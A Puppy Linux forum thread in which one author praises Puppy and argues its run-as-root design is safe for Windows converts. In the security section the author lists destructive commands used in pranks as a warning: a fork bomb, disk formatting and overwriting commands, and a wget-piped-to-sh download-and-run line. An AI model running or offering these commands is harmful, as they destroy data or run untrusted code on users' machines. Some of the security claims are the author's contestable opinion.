The Real Power That Is Puppy

Promote Puppy !
Post Reply
Message
Author
User avatar
dk60902
Posts: 230
Joined: Sun 26 Sep 2010, 22:34
Location: In front of my computer

#16 Post by dk60902 »

rmcellig wrote:Well, I'm back trying Puppy Linux 5.2.8. Like other posts in this great thread, I have been trying other distros. Some of them I like but coming back to Puppy is like opening the door on the first day of Spring and smelling air that is refreshing and promising. Maybe not the greatest analogy :) but you know what I mean. I'm giving it another go. My Dell 3000 and my old HP laptop are currently booted from CD accessing a save file on the internal HD. So far things are going fine again.
I'm doing the same with my Compaq laptop.
HP Pavilion Mini Pentium 1.7 GHz Dual Core 12 GB RAM 120 GB SSD Linux Lite 3.8 64-bit w/ Kensington Slimblade Trackball
Bionic8.0 Xenial64 Tahr64 USB frugal install
Samsung Chromebook Plus
LG V20 LG Xpression Plus Huawei Ascend XT2

humanise
Posts: 15
Joined: Fri 22 Apr 2011, 10:06
Location: Melbourne, Australia
Contact:

The Real Power that is Puppy

#17 Post by humanise »

The following article is actually part of a longer article that I'm writing which is my wish list for how we should develop Puppy Linux further. My own belief is that work on a system such as Puppy should be to further improve the areas that it's already good at, making them even better rather than trying to improve the areas where other systems are as good or better. The longer article is still a work in progress. If there are any faults in my description of Puppy please tell me.


The Real Power that is Puppy
----------------------------

Regardless of the large number of great Linux systems available, I believe that Puppy Linux is the best of its class. Defining exactly what that class is, is difficult and probably contentious.

Writing this is hard for me as I don't have a great knowledge of other Linux distributions. There's so many that there probably isn't anyone that knows them all and anyway, I've been so happy with Puppy, I spend almost all my time using that. To be more precise I'm currently using a frugal installed Precise Puppy (currently 5.7.1) as a dual boot with MS Windows and haven't even tried most of the other current Puppy distributions let alone the large number of other Linuxs. I'm making a few presumptions as to what exists and doesn't in other Linux distributions. If I'm wrong, please correct.

Puppy is used by many computer gurus, particularly due to its high speed, typically running out of RAM, plus its reputation of being a stable platform. Many, but not all, gurus still prefer a GUI (Graphical User Interface) system. It is one of only a small number of GUI Linux systems with all these abilities, but it is not unique in these abilities and as to whether it's the best of this kind would be a hotly contested question. Wikipedia lists 25 Linux versions that will operate out of RAM at http://en.wikipedia.org/wiki/List_of_Li ... n_from_RAM. Of systems that can run out of RAM there are probably only 3 or 4 other Linux systems that can be classed as both stable and reasonably easy to use GUI system.

Where I thought it outshone all other systems when I started using Puppy some years ago was in its use by users trying to transition from MS Windows to Linux or users who're required to keep some use of their MS Windows system. At that stage it was a leader in having a liveCD and a frugal install with a persistence file that allows you to share a single MS Windows formated disk both while running Linux and running MS Windows. Now, there's a number of LiveCD systems with setups that give similar frugal installs.

Puppy Linux has a great set of tools to allow a user to initially install and setup the operating system. If it's not the best system from the point of view of allowing general non guru MS Windows users to install and setup their operating systems, then it must be very near the best.

Between the above, we have a good system for many people, but with only these abilities it is still only arguably the best or just one of the best.

The main place where Puppy Linux most shows its clear superiority over all other Linux systems is still in its use by users trying to transition from MS Windows to Linux or users who're required to keep some use of their MS Windows system. Continuing upgrades to Puppy has made it the system where you just click to install user software from almost any source, with an interface that makes any previous MS Windows user comfortable.

In today's world, even the current low skilled Windows user tends to be more sophisticated than being satisfied with a predefined set of applications. Even the large number of applications in the likes of the Ubuntu repository isn't enough.

As well as a full GUI interface to download and install programs from both the Ubuntu and Puppy repositories, with the very impressive Package Manager that handles all the dependencies etc, current Puppy systems also allow you to download and install almost any package you can obtain of the following types:

Puppy .pet
Debian/Ubuntu .deb,
Slackware .tgz and
Arch .pkg.tar.gz

Simply click on these and you'll receive an offer from Puppy Package Manager to install it. They install like Puppy's own packages, with a menu entry created if appropriate.

After these packages there remains a great range of Linux software that's simply compressed but has no other packaging. Even here, installation on Puppy is just like the older MS Windows packages where you would have unzipped an installation directory and then ran the .exe file.

I recently installed Celtx which is a specialist editor for writing film scripts and stage plays. Even though this program is the best known public domain program for this application, it wasn't available from the Ubuntu repositories. To install you first download its .tar.bz2 compressed file, obtained from the Celt.com website. Simply clicking on this file brought up a graphical interface almost exactly like unzipping a file under MS Windows. After decompressing and saving you can just click the 'celt' file to run it. Alternatively, you drag the 'celt' file to the desktop and hey presto you have a icon on the desktop that you can use to run the program. It felt just like an old MS Windows install, except that the file to run was named 'celt' not 'celt.exe'. No need to use 'sudo', no need to type any commands, no need to reboot the system to log in as root or admin, just click and it works.

I very much doubt that there are any other stable RAM based easy to use GUI interface systems with such wide and easy to install abilities like this. If any other system is as good at all these points, please tell me what it is.

The simpler interface for user software installation along with the amount of software available becomes more important when you examine most of the installation instructions being given by other Linux systems.

One would expect Linux command instructions to be similar from one Linux system to the other just as the DOS commands you could use under Windows 3.1 were almost the same as the DOS commands under Windows 95 and XP etc. Unfortunately, with the installation commands being used by most Linux systems that I've observed, the instructions (commands to be typed) being given for how to install from one Linux system (or perhaps subgroup of Linux systems) to the next tend to be different.

Techniques learned in working with one GUI system tend to be more universal, being used for other things both in that system and in most other systems.

Another area where it seems to have a superiority over other GUI systems that can run out of RAM, is in the size and power of the system while still being able to run out of RAM. Reasons why Puppy allows a larger set of user programs while still providing the responsiveness of a system running within the RAM are as follows:

A) A smaller base Operating System as it doesn't contain the Multiuser facilities and all the related security.

B) Puppy's on the fly load and unload of Union Mounted or overlaid squashfs (SFS) files. I'm not sure what facilities other Linux systems provide for Union Mounted or overlaid squashfs files or equivalent but Puppy's use of them is very impressive. They allow a person like myself who usually wants a large operating system with a big range of user programs to use a system that is so small that it runs in RAM with the speed and responsiveness advantages that this gives.

For myself this is because although I need development software as provided by the devx sfs, I only occasionally use it. Similarly, with Gimp which I only occasionally use. With these large programs I have the SFS files downloaded but not set to be loaded at bootup. On the occasion that I want to use them, I load them on-the-fly before use. Note: This also reduces bootup time.

C) Puppy's internal design seems to have a number design factors that allow a far larger Linux system to run from RAM. As I understand it, when Puppy loads the SFS files into RAM they are stored in RAM in the compressed form. Some figures I've seen show the SFS format as typically giving a better than a 1 to 3 ratio on size while continuing to allow very good random access to the directories and files within it. Note that Puppy requires additional RAM to hold each program when it runs the program. This a side effect of only holding the system in compressed form. Regardless of this side effect, holding programs in RAM in compressed form allows a far larger system to run out of RAM. Most of Puppy Linux other then the persistence file and the kernel is stored as SFS.

Note that the above assumes that there is enough RAM to run as just described. It also has other options when RAM is less than that.

The above described factors mean that Puppy Linux's initial load is a lot faster than it would be otherwise. On the other hand, these factors mean that it won't be as fast at starting up programs or initially opening files from the persistence data compared to other systems that run out of RAM that don't use these factors.

I've seen a number of reviews of Puppy Linux. In each case the reviewer appears to be unaware of these factors. In every review the reviewer described the running of Puppy Linux as providing the speed and responsiveness expected from a system running out of RAM. It's also my experience that these factors haven't significantly reduced the running speed and responsiveness.

Note that the above description of RAM usage only describes the additional RAM used to give the speed and responsiveness of a system described as running in RAM. Puppy, like all other Linux systems uses RAM in a variable way (ie highly Dependant on RAM available) for things such as an intermediate cache for disk writes etc. For many computers, this ends up taking the largest part of the RAM used.

What I don't know is how much the above described factors help in making Puppy unique. How many of the other systems that run out of RAM use these factors? I gather that Knoppix and its derivatives such as Damn Small Linux are similar in some of these details.

D) Puppy provides several methods that allow users to have programs and data that won't be loaded into RAM unless it is used. Programs and data installed on the /mnt/home directory (effectively the MS Windows C:/ directory) come in this category.

Puppy also offers a very interesting alternative which isn't well known. This is to have a complete Linux distribution mounted as an underdog (ie underlying) layer of the Puppy Linux system. This is implemented using a simple underdog.lnx text file containing just the name of a partition, for example "hda1". This little file is placed in the same place as you're putting your boot (.sfs and initrd.gz etc) files. At bootup Puppy will read underdog.lnx and mount the partition as the bottom layer. If that partition happens to have a Linux distro installed in it, then the entire distro filesystem will "show through" to the top layer of Puppy's unionfs. It will look like a normal Puppy, same desktop, but everything in the underlying distro is available to be executed. All the applications, compile environment, package manager, etc.


The above is meant to give the main areas where Puppy outshines other Operating Systems for the biggest number of users. It happens to also be heavily used and is probably the best in several specialist areas.

An example of this is its use by spies and other people needing an ultra high security system, particular in situations where users needs to share computer facilities with other users, or when people are traveling and using other people's computers. This may sound like a contradiction to other statements herein about it being single user and having theoretical problems about its security but the use of it in this application is different. Here it's probably being stored on a removable USB device, able to be physically removed after each use, with its small size being used to make it easy to completely encrypt as well as to run within ram so that it doesn't leave a trail through disk caching etc.

Puppy has great software that makes it easy to create specialist versions. Consequent on this, a number of specialist applications have their own special versions.

An example of this is a special version with long term support, providing a lot of the latest software but designed specifically to run on older computers. You might expect that other smaller versions of Linux would also be able to do this, but in most cases this isn't true. To do a good job of this the system needs to add or use specific software for this task such as an older kernel, drivers such as video drivers more apt for the older hardware and support for older communications techniques. Most of todays small systems don't want to include this.

The quality of the software for making specialist versions is so good that this system should probably be the first system looked at by anyone wanting to make a specialist Operating System.

Regardless of the large number of specialist uses, the remainder of this will concentrate on what I believe are its primary advantages to the greatest number of people, particularly the greatest number of potential users. That is, its use by users trying to transition from MS Windows to Linux or users who're required to keep some use of their MS Windows system.

From the above we see that several of the main advantages come from having a single user system. That is, the lower security requirements that come from having a single user system allowing easier installation requirements and the smaller size allowing a larger system while still running out of RAM.

Puppy is criticized for theoretical concerns relating to security due to the fact that users normally run as root. The more you examine these concerns, the more they become irrelevant concerns for most users.

Lets go through the various types of security needed and look at Puppy Linux. The following analysis concentrates on security concerns for a typical non guru, non programmer user. Security concerns can be split into four areas.

1) Threats from External Hackers:

Puppy Linux provides a good firewall and the standard install scripts make it very easy for the installer to enable it. Further, a number of alternative firewalls are available through Puppy Package Manager. Overall, this is as good or better than most other Linux systems.

If I was an external hacker looking for an easy system to hack into, Puppy Linux would be near last on my list. I would look for the larger more complex systems that had more server type software installed. Each different running server provides a possibility to provide the hooks that the hacker needs. For example, almost all other Linux systems provide true multiuser facilities where external users can log into the system from the network and use it simultaneously with a user on the console. This, like each implemented server, provides a possible avenue of entry for the hacker.

2) Threats from purposefully created Malware:

So long as Puppy continues to make it obvious to the user that they are installing software before software is installed, then the risks relating to malware for Puppy are little different to those from other Linux systems.

Just as with other Linux systems, we are currently finding almost zero problems relating to purposefully created malware. There are a large number of reasons why Linux systems such as Puppy have such a low problem with malware. These include but not limited to:

- Security due to obscurity,
- Security due to a hackers honour among thieves creed (eg its cool to damage systems made by the greedy Microsoft empire but not cool to hurt the work of volunteer coders of Open Source),
- Methodologies used to create and update Linux repositories,
- Difficulty of hiding Linux malware as there's a higher percentage of Guru Linux users who are quick to notice malware.
- Quality of main software repositories such as the Ubuntu repository so that it becomes less likely that the user has to search into less certain areas.

Regardless of the reasons why, problems on Puppy Linux systems relating to purposefully created malware are an order or two orders of magnitude less than the problems being experienced by MS Windows users. In fact, the problems with viruses and the like on MS Windows are the main reason that people should be looking at converting to Puppy Linux.

It should be noted that Puppy is good at telling the user what is going on and giving the user the chance to back out if this is not what they're wanting to do. It's critical that users know that they're installing software before they are committed to the install. Once you have that, then putting users through extra hoops (such as logging in or typing sudu) does little to help security.

Likelihood of there being Malware within the main Puppy distribution is in my opinion, less with Puppy than with most other Linux systems. The reason for this is that Puppy Linux is more of a one man (Barry Kauler ) designed system than most other Linux systems. Like most Linux systems there is a team of contributors, contributing to the development, testing, helping with web pages, helping out in the forum, creating documentation etc. Regardless of this Barry Kauler has kept a firmer hold on the final creation than that seen with other Linux Operating Systems. In particular, only he holds write access to the source code stored in the SVC/SVN server. Any patches etc. have to be given to him for examination before they get into the server. While there are limits as to how much one person could possible check all code, I think the current process helps reduce the risk of malware getting into the code.

3) Threats from others with physical access to the Computer:

Current Puppy has Xlock as a screen locker which has similar facilities to most screen lockers. A number of alternative screen lockers are available through Puppy Package Manager. Overall, this is as good or better than most other Linux systems.

4) Security from the User:

This category includes accidents by the user and security against trolls and other pranksters who persuade users to do damaging things.

It is quite hard to show how running as root on a single user system is some sort of security risk. When examples are created they are almost invariable examples where a user using the command line deletes the system or part of it using a command such as 'rm -rf /' or a weird looking hex disguised version of such.

While it's possible to cause major damage without the command line, the likelihood of users doing so tends to go down drastically. This is particularly so with people who don't fully understand the commands that they're being asked to type (your typical recent convert from MS Windows). Puppy's design helps users remain within the GUI that they understand what they are doing for a larger range of their tasks. This makes it safer rather than the other way around.

When you see trolls on the Internet who think that it's a great joke to create a hex disguised version of a damaging command and persuade the unwary to type it in, you need to look at how not running as root would help. The Ubuntu method of requiring the 'sudu' prefix helps little as that can be easily added to the hex. Further, if the troll can persuade the user to type the hex string then they can probably get them to log in as root.

Similar examples include a range of exploits such as persuading users to type:

':(){ :|: & };:' – Fork Bomb,
'mkfs.ext4 /mnt/sda1' – Format a Hard Drive,
'dd if=/dev/random of=/mnt/home' Write Junk to a Hard Drive,
'mv ~ /dev/null' – Moves Your Home Directory to a Black Hole,
'wget http://example.com/something -O – | sh' – Download and Run a Script.

The above are just samples. Trying to teach non guru users all possible exploits is not possible. I would rather persuade these users to stay within the GUI (Graphical User Interface) which they understand, as they can do all of their installation work there with Puppy.

When you then look at what the results of an accident are on Puppy Linux you find more reasons why most criticism relating to running as root doesn't make sense. Running as a non root user helps to protect the operating system itself, not the user's own data. In earlier times where it was common for users to share larger systems, security against problems with the operating system was paramount.

With todays Puppy Linux running as a typical frugal install, the whole of the operating system is just a small number of files sitting within the disk or USB device. The very small size of the whole operating system, as compressed within the squashed file system, means that it's very easy to back up and this is more likely to be done than with larger systems. Reinstalling it is just a few minutes work. Even in the case where someone doesn't back it up, its such an easy system to reinstall that it isn't a serious problem.

It is my contention that the overall safety (both likelihood of a problem and size of the problem) for MS Windows converts is better with Puppy Linux than other Linux systems such as Ubuntu.

The above security analysis is all based on the typical MS Windows convert to Linux rather than the computer guru using Linux for software development. With looking at platforms best suited for software development, particularly testing, there becomes better arguments against running as root. Even here many software developers and other gurus are finding that the advantages are outweighing the disadvantages when using Puppy Linux.

The latest version of Puppy (5.7.1) has an experimental ability to log in as a non root user. To my experience of computer operating systems it's an unusual implementation. It neither protects the internals of the operating system or the internals of the persistence data. Rather, it protects everything outside of these.

I think that in its overall direction, this makes a lot more sense than the typical root/user login of other Linux systems. With typical home user Linux systems, the security that's important is the security on user data such as the documents that the user is creating. Strangely, the normal Linux root/user login security does little in helping to secure this.

I'm not currently using it as it doesn't fit in with the way I work. I like to store direct to the hard disk and keep the persistence file small. I think that it needs further work to allow users like myself to use it.

As I understand it, an effective use would require the user to make a frequent habit of backing up the persistence data, either as a whole or from the internal data. The problem with this is that performing each backup requires logging in as root. While operating as a non root user it basically protects the backups along with protection of other operating systems on the computer.

Note that only protecting backups is all that could sensibly be done. If you tried to protect the latest data, your applications wouldn't be able to save.

Puppy, like all systems, is not the best system for everyone. For anyone wanting to use a traditional multiuser system, this is not the system. Also, if you're using your system for a business application where you have characteristics such as security is essential and for legal reasons must be able to show it with correctness and proactive emphasis of security then Puppy may not be the right system. Even though it's just for legal reasons or similar politics, the contentious nature of the direction that Puppy has taken to its security would probably make you look at something else like OpenBSD.

I'm a little sick of reading reviews that treat Puppy Linux as something you would use only if you have an old or small computer. I, like many people who use it, am running a computer that could easily run a larger Linux system such as Ubuntu. There are many advantages to using Puppy regardless of your computer's size.


To Sum Up What Puppy Is:
------------------------

What most distinguishes Puppy from other good Linux systems. Puppy is nearest to being the 'It Just Works' without having to type text (DOS like) commands into a command line shell and its super fast as it runs out of RAM.

Overall Puppy excels in that 'you click on it and it installs or it just works, and it works super fast'. A great mass of Linux software from a great range of sources is easily installable by your non guru using only a simple Windows (GUI) type interface.

Instead of people talking about Puppy as being less secure than other distributions we should talk about it as being more secure than other distributions such as Ubuntu. It is more secure because it is simpler and therefor harder to break into. For someone to hack into a computer they need an already running server as a hook.

Puppy is very much a click on it and it installs or just works, which Ubuntu is not, largely due to Ubuntu's 'sudu', attempting to create security by adding complexity.

For example, instructions for how to install a program with Ubuntu will never work with most other Linux systems and vice versa.

Note: Ubuntu has synaptic which is GUI based package manager for installing software, so under Ubuntu it is possible to at least install from the Ubuntu repository using only the GUI. Regardless of that, almost every time I see instructions for Ubuntu users, they are written as Command Line Interface instructions. It appears to me that the Ubuntu community, and most other Linux communities, are trying to bring their users into using the Command Line.

Post Reply